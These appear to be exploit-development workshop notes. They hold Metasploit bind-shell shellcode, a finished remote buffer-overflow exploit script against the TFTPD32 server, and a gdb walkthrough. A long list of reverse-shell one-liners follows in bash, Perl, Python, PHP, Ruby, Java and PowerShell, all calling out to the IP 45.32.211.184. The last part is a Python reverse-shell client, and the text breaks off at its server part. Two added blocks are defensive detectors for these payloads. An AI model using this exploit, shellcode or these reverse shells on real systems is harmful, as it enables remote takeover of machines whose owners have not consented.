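Two things to verify on a real target before sending: the pop-pop-ret must come from a module without SafeSEH, and neither the short nor the near jump may contain a bad character (the displacement bytes change every time the layout does).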
#########################################
# Lab 2c: Not Enough Space (Trampoline) #
#########################################

---------------------------Type This-----------------------------------
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
-----------------------------------------------------------------------

On the Strategicsec-XP-ED-Target-VM VM

- open a command prompt
- cd c:\software\tftpd32
- run tftpd32.exe
- it listens on UDP port 69
(socket code is already in the scripts)

On your attack host please install:

  NASM - Netwide Assembler (we only need its disassembler, ndisasm)

-----------------------------------------------------------------------------------------------------------------

We want to generate the shellcode (BIND SHELL on port 4444)
- No restricted characters
- Encoder: NONE

Why no encoder: we are going to read the disassembly and split the shellcode in two at an instruction boundary. An encoded payload would need its decoder stub and the whole encoded body in one contiguous block, and its listing would show the decoder, not the real instructions.

Create a Python file called dumpshellcode.py

---
#!/usr/bin/python2
# Write the raw Metasploit bind-shell bytes to stdout so they can be fed to ndisasm.

import os
import sys

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

# stdout must be in binary mode: on Windows a text-mode stdout turns every 0x0a into 0x0d 0x0a
if sys.platform == "win32":
    import msvcrt
    msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)

sys.stdout.write(shellcode)
---

---------------------------Type This-----------------------------------
python dumpshellcode.py > bindshell.bin
-----------------------------------------------------------------------

Copy bindshell.bin into the "c:\Program Files\nasm" directory.

Here we saved the raw shellcode generated by Metasploit into a file called bindshell.bin. Check the size: it must be exactly the 317 bytes Metasploit reported (if it is larger, the redirect ran in text mode and corrupted the bytes):
317 bindshell.bin

---------------------------Type This-----------------------------------
C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
-----------------------------------------------------------------------

00000000  FC                cld
00000001  6AEB              push byte -0x15
00000003  4D                dec ebp
00000004  E8F9FFFFFF        call dword 0x2
00000009  60                pushad
0000000A  8B6C2424          mov ebp,[esp+0x24]
0000000E  8B453C            mov eax,[ebp+0x3c]
00000011  8B7C0578          mov edi,[ebp+eax+0x78]
00000015  01EF              add edi,ebp
00000017  8B4F18            mov ecx,[edi+0x18]
0000001A  8B5F20            mov ebx,[edi+0x20]
0000001D  01EB              add ebx,ebp
0000001F  49                dec ecx
00000020  8B348B            mov esi,[ebx+ecx*4]
00000023  01EE              add esi,ebp
00000025  31C0              xor eax,eax
00000027  99                cdq
00000028  AC                lodsb
00000029  84C0              test al,al
0000002B  7407              jz 0x34
0000002D  C1CA0D            ror edx,0xd
00000030  01C2              add edx,eax
00000032  EBF4              jmp short 0x28
00000034  3B542428          cmp edx,[esp+0x28]
00000038  75E5              jnz 0x1f
0000003A  8B5F24            mov ebx,[edi+0x24]
0000003D  01EB              add ebx,ebp
0000003F  668B0C4B          mov cx,[ebx+ecx*2]
00000043  8B5F1C            mov ebx,[edi+0x1c]
00000046  01EB              add ebx,ebp
00000048  032C8B            add ebp,[ebx+ecx*4]
0000004B  896C241C          mov [esp+0x1c],ebp
0000004F  61                popad
00000050  C3                ret
00000051  31DB              xor ebx,ebx
00000053  648B4330          mov eax,[fs:ebx+0x30]
00000057  8B400C            mov eax,[eax+0xc]
0000005A  8B701C            mov esi,[eax+0x1c]
0000005D  AD                lodsd
0000005E  8B4008            mov eax,[eax+0x8]
00000061  5E                pop esi
00000062  688E4E0EEC        push dword 0xec0e4e8e
00000067  50                push eax
00000068  FFD6              call esi
0000006A  6653              push bx
0000006C  66683332          push word 0x3233
00000070  687773325F        push dword 0x5f327377
00000075  54                push esp
00000076  FFD0              call eax
00000078  68CBEDFC3B        push dword 0x3bfcedcb
0000007D  50                push eax
0000007E  FFD6              call esi                     PART 1
00000080  5F                pop edi
00000081  89E5              mov ebp,esp
00000083  6681ED0802        sub bp,0x208
00000088  55                push ebp
00000089  6A02              push byte +0x2
0000008B  FFD0              call eax
0000008D  68D909F5AD        push dword 0xadf509d9
00000092  57                push edi
00000093  FFD6              call esi
00000095  53                push ebx
00000096  53                push ebx
--------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
00000097  53                push ebx
00000098  53                push ebx
00000099  53                push ebx
0000009A  43                inc ebx
0000009B  53                push ebx
0000009C  43                inc ebx
0000009D  53                push ebx                       PART 2
0000009E  FFD0              call eax
000000A0  6668115C          push word 0x5c11
000000A4  6653              push bx
000000A6  89E1              mov ecx,esp
000000A8  95                xchg eax,ebp
000000A9  68A41A70C7        push dword 0xc7701aa4
000000AE  57                push edi
000000AF  FFD6              call esi
000000B1  6A10              push byte +0x10
000000B3  51                push ecx
000000B4  55                push ebp
000000B5  FFD0              call eax
000000B7  68A4AD2EE9        push dword 0xe92eada4
000000BC  57                push edi
000000BD  FFD6              call esi
000000BF  53                push ebx
000000C0  55                push ebp
000000C1  FFD0              call eax
000000C3  68E5498649        push dword 0x498649e5
000000C8  57                push edi
000000C9  FFD6              call esi
000000CB  50                push eax
000000CC  54                push esp
000000CD  54                push esp
000000CE  55                push ebp
000000CF  FFD0              call eax
000000D1  93                xchg eax,ebx
000000D2  68E779C679        push dword 0x79c679e7
000000D7  57                push edi
000000D8  FFD6              call esi
000000DA  55                push ebp
000000DB  FFD0              call eax
000000DD  666A64            push word 0x64
000000E0  6668636D          push word 0x6d63
000000E4  89E5              mov ebp,esp
000000E6  6A50              push byte +0x50
000000E8  59                pop ecx
000000E9  29CC              sub esp,ecx
000000EB  89E7              mov edi,esp
000000ED  6A44              push byte +0x44
000000EF  89E2              mov edx,esp
000000F1  31C0              xor eax,eax
000000F3  F3AA              rep stosb
000000F5  FE422D            inc byte [edx+0x2d]
000000F8  FE422C            inc byte [edx+0x2c]
000000FB  93                xchg eax,ebx
000000FC  8D7A38            lea edi,[edx+0x38]
000000FF  AB                stosd
00000100  AB                stosd
00000101  AB                stosd
00000102  6872FEB316        push dword 0x16b3fe72
00000107  FF7544            push dword [ebp+0x44]
0000010A  FFD6              call esi
0000010C  5B                pop ebx
0000010D  57                push edi
0000010E  52                push edx
0000010F  51                push ecx
00000110  51                push ecx
00000111  51                push ecx
00000112  6A01              push byte +0x1
00000114  51                push ecx
00000115  51                push ecx
00000116  55                push ebp
00000117  51                push ecx
00000118  FFD0              call eax
0000011A  68ADD905CE        push dword 0xce05d9ad
0000011F  53                push ebx
00000120  FFD6              call esi
00000122  6AFF              push byte -0x1
00000124  FF37              push dword [edi]
00000126  FFD0              call eax
00000128  8B57FC            mov edx,[edi-0x4]
0000012B  83C464            add esp,byte +0x64
0000012E  FFD6              call esi
00000130  52                push edx
00000131  FFD0              call eax
00000133  68F08A045F        push dword 0x5f048af0
00000138  53                push ebx
00000139  FFD6              call esi
0000013B  FFD0              call eax

Reading the listing: ndisasm is a linear sweep, so the first lines are misleading. At run time "call dword 0x2" pushes the address of the next instruction (0x09, the start of the hash-based API resolver that runs to the ret at 0x50) and jumps back to offset 0x02, where the bytes EB 4D decode as "jmp short 0x51", the real entry point. The main body at 0x51 walks the PEB to find kernel32, pops the resolver address into ESI, and every "push <hash> / call esi" resolves one API (0xec0e4e8e is LoadLibraryA, called with the "ws2_32" string pushed just after it); "call eax" then calls the resolved function.

The CUT is placed between the "push ebx" at 0x96 and the one at 0x97: both halves begin and end on an instruction boundary, PART 1 is bytes 0x00-0x96 (151 bytes) and PART 2 is bytes 0x97-0x13c (166 bytes), which together are the 317 bytes Metasploit reported.

-------------------------------------------------------------------------------------------
Another option would be to go to a website like:
http://shell-storm.org/online/Online-Assembler-and-Disassembler/

Choose the bottom box and paste the shellcode string from dumpshellcode.py above into it (the "\xfc\x6a\xeb..." lines). Select x86 (32), make sure that little endian is checked, then click "Disassemble". Keep in mind that you are handing a payload to a third-party site.

Now split the shellcode at the CUT point: part1 is the first 151 bytes (0x00-0x96), part2 the remaining 166 bytes (0x97-0x13c).

part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"

part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

STACK SHIFTER:
prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  # add esp, -0x1001
prepend += "\x44"                     # inc esp  -> net effect: esp -= 0x1000

Why -0x1001 plus an inc esp instead of a plain add esp,-0x1000: the encoding of add esp,-0x1000 is 81 C4 00 F0 FF FF, which contains a null byte, and the payload is delivered as a string. -0x1001 encodes as FF EF FF FF, and the extra inc esp corrects the off-by-one. The shift itself is needed because the payload sits on the stack right where ESP points: without moving ESP away first, the shellcode's own pushes and calls would overwrite its own bytes.

 
2423
 
2424
 
2425
 
2426
 
2427
 
2428
 
2429
 
2430
 
2431
 
2432
 
2433
 
2434
 
2435
 
2436
---- final script ----
2437
 
2438
#!/usr/bin/python2
# TFTP Server remote Buffer Overflow

import sys
import socket
import struct

if len(sys.argv) < 2:
    sys.stderr.write("Usage: tftpd.py <host>\n")
    sys.exit(1)

target = sys.argv[1]
port = 69

eip = 0x7e429353         # jmp esp in USER32.DLL

part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"

part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

prepend = "\x81\xC4\xFF\xEF\xFF\xFF"            # add esp, -1001h
prepend += "\x44"                               # inc esp

buf = "\x00\x01"                                # TFTP read request opcode

buf += "\x90" * (256 - len(part2))              # NOPs
buf += part2                                    # shellcode part 2
buf += struct.pack('<I', eip)                   # EIP (JMP ESP)
buf += prepend                                  # stack shifter
buf += part1                                    # shellcode part 1
buf += "\xE9" + struct.pack('<i', -380)         # JMP -380
buf += "\x00"                                   # END

# print buf

# buf = "\x00\x01"                              # receive command

# buf += "A" * 300 + "\x00"

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

try:
    sock.connect((target, port))
    sock.sendall(buf)
except Exception as e:
    sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
finally:
    sock.close()
    sys.stderr.write("Sent.\n")



-----------------------------------------------------------------------------------------------------------------


How does all of this actually work?


Total shellcode length:     315

                Part1:  150
                Part2:  165


NOPS * (256 - 165)

91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
            |           |                   |
            256         260                 150 (410)       |
  |<------------------------------------------------------------------------------------------------------------|
 Jump to the
 30 byte mark


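The layout above is what the overflow looks like from the attacker's side. As an added example (not part of the course notes), here is the same packet seen from the defender's side: a parser for the TFTP read/write request format (RFC 1350: 2-byte opcode, NUL-terminated filename, NUL-terminated mode) that flags the traits of this payload on the wire, namely a filename far longer than any real one, non-printable bytes, a run of 0x90 NOPs, and a missing or bogus mode field. The length and NOP-run thresholds and the two sample packets are assumptions constructed for this example.

```python
"""Defender-side check for oversized / shellcode-like TFTP requests.

Added example, not part of the course notes. Parses RRQ/WRQ packets per
RFC 1350 and reports why a request looks like the overflow payload above.
Thresholds and sample packets are constructed for this example.
"""
import struct

MAX_SANE_FILENAME = 128   # assumption: no legitimate TFTP filename is longer
NOP_RUN_THRESHOLD = 16    # assumption: 16+ consecutive 0x90 bytes is a sled
KNOWN_MODES = (b"netascii", b"octet", b"mail")


def parse_tftp_request(packet):
    """Return (opcode, filename, mode) for a TFTP RRQ (1) or WRQ (2).

    Raises ValueError for anything that is not a well-formed request.
    """
    if len(packet) < 4:
        raise ValueError("packet too short for a TFTP request")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in (1, 2):
        raise ValueError("not an RRQ/WRQ opcode: %d" % opcode)
    fields = packet[2:].split(b"\x00")
    # A well-formed request has at least filename<NUL>mode<NUL>.
    if len(fields) < 2:
        raise ValueError("missing NUL terminator in request")
    return opcode, fields[0], fields[1]


def longest_byte_run(data, value):
    """Length of the longest run of `value` inside `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def assess_tftp_request(packet):
    """Return a list of findings; an empty list means the request looks benign."""
    try:
        _opcode, filename, mode = parse_tftp_request(packet)
    except ValueError as exc:
        return ["malformed: %s" % exc]
    findings = []
    if len(filename) > MAX_SANE_FILENAME:
        findings.append("filename length %d exceeds %d"
                        % (len(filename), MAX_SANE_FILENAME))
    if any(b < 0x20 or b > 0x7e for b in filename):
        findings.append("filename contains non-printable bytes")
    run = longest_byte_run(filename, 0x90)
    if run >= NOP_RUN_THRESHOLD:
        findings.append("NOP sled: %d consecutive 0x90 bytes" % run)
    if mode.lower() not in KNOWN_MODES:
        findings.append("unexpected mode %r" % mode)
    return findings


# Constructed samples: a normal read request, and one shaped like the
# payload above (opcode, 91-byte NOP sled, 165 filler bytes standing in
# for shellcode, a 4-byte return address, and no mode field at all).
BENIGN = b"\x00\x01" + b"boot.cfg\x00" + b"octet\x00"
SUSPICIOUS = b"\x00\x01" + b"\x90" * 91 + b"\xcc" * 165 + b"ABCD" + b"\x00"

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, assess_tftp_request(pkt) or "no findings")
```

A sensor only needs the first few hundred bytes of the datagram to run this; the point is that the payload is distinguishable from a real request on length alone, before any signature on the shellcode bytes.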
=================================================================================


##############################
# Intro to function chaining #
##############################
ssh into 192.168.1.117
username: exploitlab
password: exploitlab


---------------------------Type This-----------------------------------
cd /home/exploitlab
cat victim2.c
make victim2
./victim2 AAAAAAAAAAAAA
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
gdb victim2
disassemble main

break *0x080483cb

run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
bt
x/i $eip
x/64x $esp


quit
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
cat frame1.pl
export EGG=`./frame1.pl`
gdb victim2
(gdb) run $EGG
-----------------------------------------------------------------------



x/100i 0x80484a5		(looking for a pop/pop/ret)
quit
cat frame2.pl
export EGG=`./frame2.pl`
gdb victim2
run $EGG


stepi


-------------------------------------------------------------------------------------------------------


Lots of reverse shells in different languages
---------------------------------------------------------------------



########
# Bash #
########

---------------------------Type This-----------------------------------

bash -i >& /dev/tcp/45.32.211.184/8080 0>&1

----------------------------------------------------------------------

****** Note: /dev/tcp is usually available in Red Hat derivatives and NOT in Debian derivatives; there you want to try /proc/net/tcp instead ******


########
# Perl #
########

---------------------------Type This-----------------------------------


perl -e 'use Socket;$i="45.32.211.184";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

----------------------------------------------------------------------



----------------------------------------------------------------------
cat perlbackdoor.pl
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("/bin/sh -i");

----------------------------------------------------------------------

##########
# Python #
##########

---------------------------Type This-----------------------------------

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.32.211.184",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

----------------------------------------------------------------------


#######
# PHP #
#######
---------------------------Type This-----------------------------------

php -r '$sock=fsockopen("45.32.211.184",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

----------------------------------------------------------------------


########
# Ruby #
########
---------------------------Type This-----------------------------------

ruby -rsocket -e'f=TCPSocket.open("45.32.211.184",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

----------------------------------------------------------------------


########
# Java #
########
---------------------------Type This-----------------------------------

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/45.32.211.184/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


exec 5<>/dev/tcp/45.32.211.184/1234


cat <&5 | while read line; do $line 2>&5 >&5; done

exec 5<>/dev/tcp/45.32.211.184/1234

while read line 0<&5; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/45.32.211.184/1234; sh <&196 >&196 2>&196

----------------------------------------------------------------------
****** Note: /dev/tcp is usually available in Red Hat derivatives and NOT in Debian derivatives; there you want to try /proc/net/tcp instead ******



##############
# Powershell #
##############
---------------------------Type This-----------------------------------

powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()};  if ($process.ExitCode -ne $null) {$process.Close()};  exit;  };$address = '45.32.211.184';  $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize  ;$process = New-Object System.Diagnostics.Process  ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'  ;$process.StartInfo.RedirectStandardInput = 1  ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0  ;$process.Start()  ;$inputstream = $process.StandardInput  ;$outputstream = $process.StandardOutput  ;Start-Sleep 1  ;$encoding = new-object System.Text.AsciiEncoding  ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length)  ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup}  ;$pos = 0; $i = 1;  while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos);  $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}  ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos);  $inputstream.write($string);  start-sleep 1;  if ($process.ExitCode -ne $null) {ReverseShellClean}else {  $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){;  $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}};  $stream.Write($encoding.GetBytes($out),0,$out.length);  $out = $null;  $string = $null}} else {ReverseShellClean}};"


----------------------------------------------------------------------

**** This shell has been VERY VERY VERY flaky for me - maybe you can figure out what is wrong *****


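Every one of the one-liners above has a recognisable shape on the command line: an interpreter, a socket or /dev/tcp connect, file-descriptor duplication or redirection, and a shell. As an added example (not part of the course notes), the detector below encodes those shapes as rules and runs them over constructed process-creation log records. The record format (`pid=.. user=.. cmd=..`), the addresses (203.0.113.0/24 is a documentation range) and the rule names are assumptions made for this example; the callback extraction is best-effort triage data, not proof.

```python
"""Flag reverse-shell one-liners in process-creation logs.

Added example, not from the course notes. The rules mirror the bash,
python, perl, php, ruby and PowerShell one-liners listed above. Log
format and sample records are constructed for this example.
"""
import re

# (rule name, compiled pattern). DOTALL so multi-statement one-liners match.
RULES = [
    ("bash /dev/tcp redirection",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("python socket+dup2 shell",
     re.compile(r"import\s+socket.*dup2.*(?:/bin/(?:ba)?sh|cmd\.exe)", re.S)),
    ("perl Socket exec shell",
     re.compile(r"use\s+Socket.*(?:exec|system)\s*\(\s*['\"]/bin/sh", re.S)),
    ("php fsockopen exec shell",
     re.compile(r"fsockopen\s*\(.*exec\s*\(\s*['\"]/bin/sh", re.S)),
    ("ruby TCPSocket exec shell",
     re.compile(r"TCPSocket\.open\s*\(.*\bexec\b", re.S)),
    ("powershell TcpClient to cmd.exe",
     re.compile(r"net\.sockets\.tcpclient.*cmd\.exe", re.I | re.S)),
]

# Assumed log record layout; adapt LOG_RE to the real source (auditd, EDR, ...).
LOG_RE = re.compile(r"pid=(\d+) user=(\S+) cmd=(.*)$", re.S)
# ip followed by ',' or '/' and a port: covers connect(("ip",port)) and /dev/tcp/ip/port.
DEST_RE = re.compile(r"""["']?(\d{1,3}(?:\.\d{1,3}){3})["']?\s*[,/]\s*["']?(\d{1,5})""")


def classify(cmdline):
    """Names of all rules that fire on one command line (empty list = no match)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def extract_destination(cmdline):
    """Best-effort 'ip:port' callback address for triage, or None."""
    m = DEST_RE.search(cmdline)
    return "%s:%s" % (m.group(1), m.group(2)) if m else None


def scan_log(lines):
    """One finding dict per record that matches at least one rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a process-creation record
        pid, user, cmd = m.groups()
        names = classify(cmd)
        if names:
            hits.append({"pid": pid, "user": user, "rules": names,
                         "destination": extract_destination(cmd)})
    return hits


# Constructed sample records: three reverse shells and two benign commands.
SAMPLE_LOG = [
    "pid=4011 user=www-data cmd=bash -i >& /dev/tcp/203.0.113.10/8080 0>&1",
    "pid=4012 user=www-data cmd=python -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"203.0.113.10\",1234));os.dup2(s.fileno(),0);"
    "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
    "pid=4013 user=backup cmd=tar -czf /var/backups/www.tgz /var/www",
    "pid=4014 user=www-data cmd=php -r '$sock=fsockopen(\"203.0.113.10\",1234);"
    "exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "pid=4015 user=dev cmd=python -c 'import socket; print(socket.gethostname())'",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The fifth record shows why the python rule requires `dup2` and a shell path and not merely `import socket`: a bare socket import is common in legitimate scripts. Pair these command-line rules with a network-side check (the web server's user opening an outbound TCP connection) to cut false positives further.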
###############################
# Reverse Shell in Python 2.7 #
###############################

We'll create 2 python files. One for the server and one for the client.

- Below is the Python code that runs on the victim/client Windows machine:

---------------------------Paste This-----------------------------------

# Client

import socket # For Building TCP Connection
import subprocess # To start the shell in the system

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('45.32.211.184',8080))

    while True:                         # keep receiving commands
        command = s.recv(1024)

        if 'terminate' in command:
            s.close() # close the socket
            break

        else:

            CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            s.send( CMD.stdout.read()  )  # send the result
            s.send( CMD.stderr.read()  )  # in case you mistyped a command,
            # we will send back the error

def main ():
    connect()
main()


----------------------------------------------------------------------

- Below is the code that we should run on the server unit, in our case the InfosecAddicts Ubuntu machine (Ubuntu IP: 45.32.211.184)

---------------------------Paste This-----------------------------------

# Server

